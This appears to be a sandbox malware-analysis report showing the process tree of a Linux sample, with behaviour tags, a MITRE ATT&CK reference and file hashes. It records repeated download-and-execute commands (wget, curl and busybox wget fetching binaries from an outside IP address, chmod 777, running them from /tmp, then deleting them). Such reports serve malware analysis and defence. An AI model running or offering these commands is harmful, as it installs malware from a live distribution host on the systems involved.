-
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Executes dropped EXE
PID:1640
-
-
/bin/rmrm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:1641
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:1642
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Writes file to tmp directory
PID:1643
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:1644
-
-
/bin/chmodchmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Executes dropped EXE
PID:1646
-
-
/bin/rmrm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:1647
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:1648
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Writes file to tmp directory
PID:1649
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:1650
-
-
/bin/chmodchmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- File and Directory Permissions Modification
PID:1651
-
-
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Executes dropped EXE
PID:1652
-
-
/bin/rmrm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:1653
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:1654
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Writes file to tmp directory
PID:1655
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:1656
-
-
/bin/chmodchmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:1659
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:1660
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:1662
-
-
/bin/chmodchmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Executes dropped EXE
PID:1664
-
-
/bin/rmrm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:1665
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:1666
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Writes file to tmp directory
PID:1667
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:1668
-
-
/bin/chmodchmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:1671
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:1672
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Writes file to tmp directory
PID:1673
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:1674
-
-
/bin/chmodchmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Executes dropped EXE
PID:1676
-
-
/bin/rmrm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:1677
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97